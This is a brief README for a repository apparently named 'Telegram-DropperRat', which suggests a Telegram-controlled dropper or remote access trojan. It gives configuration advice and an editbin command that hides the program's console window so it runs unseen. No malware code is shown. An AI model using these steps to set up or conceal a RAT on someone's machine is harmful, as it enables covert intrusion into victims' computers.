BigO-Moha/Telegram-DropperRat/README.md

 * -*** Note change your Const.dart programid to your compiled program Name.
 * use this command to hide console while app is running [editbin.exe /subsystem:windows {yourapp}.exe]

+editbin.exe is apart of  the microsoft Visual studio 2019 {if this is not working  find it in Visual studio 2019 installed dir }

 ![alt text](https://i.ibb.co/kcjLr5S/result.png)